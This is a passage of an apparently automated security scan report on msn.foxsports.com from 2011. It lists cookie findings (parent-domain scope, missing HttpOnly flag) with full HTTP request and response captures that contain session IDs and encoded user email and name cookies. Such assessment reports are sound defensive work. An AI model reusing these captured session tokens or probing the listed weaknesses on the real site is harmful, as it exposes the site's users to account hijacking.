Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://msn.foxsports.com/account/transition?fu=%2F&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D
Content-Length: 0
Expires: Sat, 08 Jan 2011 00:30:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:30:34 GMT
Connection: close
Set-Cookie: pALERTED=TRUE; Domain=.foxsports.com; Expires=Mon, 07-Feb-2011 00:30:34 GMT; Path=/
Set-Cookie: pEFSUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Path=/
Set-Cookie: pExternalUser=; Domain=.foxsports.com; Path=/
Set-Cookie: pLMD="2011-01-08 00:29:40"; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_FNAME=Z1NVLTXWY1w=; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_LNAME=/wgeX1XilBI=; Domain=.foxsports.com; Path=/
Set-Cookie: pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; Domain=.foxsports.com; Path=/
Set-Cookie: pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; Domain=.foxsports.com; Path=/
Set-Cookie: pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; Domain=.foxsports.com; Path=/
Set-Cookie: pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; Domain=.foxsports.com; Path=/
Set-Cookie: pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; Domain=.foxsports.com; Path=/
Set-Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; Domain=.foxsports.com; Path=/
Set-Cookie: pUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Path=/


7.3. http://msn.foxsports.com/fantasy/basketball/hotstreak/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/basketball/hotstreak/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fantasy/basketball/hotstreak/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 27381
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKsceEx4Px8ipDX7pZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

7.4. http://msn.foxsports.com/fantasy/football/frankspicks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/football/frankspicks/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fantasy/football/frankspicks/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 24812
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKscei73uaW8KKlbpZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

8. Cookie without HttpOnly flag set  previous  next
There are 9 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



8.1. http://msn.foxsports.com/account/logout  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/logout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/logout HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://msn.foxsports.com/account/transition?fu=%2F&initiatingAction=logout
Content-Length: 0
Expires: Sat, 08 Jan 2011 01:12:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:12:06 GMT
Connection: close
Set-Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pLMD="2011-01-08 00:30:34"; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_LNAME=/wgeX1XilBI=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pRME=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: UnicaNIODID=I7HpnSWrYC7-Ww6qltH; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_FNAME=Z1NVLTXWY1w=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _gig_mig=1; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pEFSUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NetInsightSessionID=1; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _chartbeat2=oxy92bi233plhtq3; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pExternalUser=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: MUID=65AFF4B77A124856A6B4337A160FA285; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
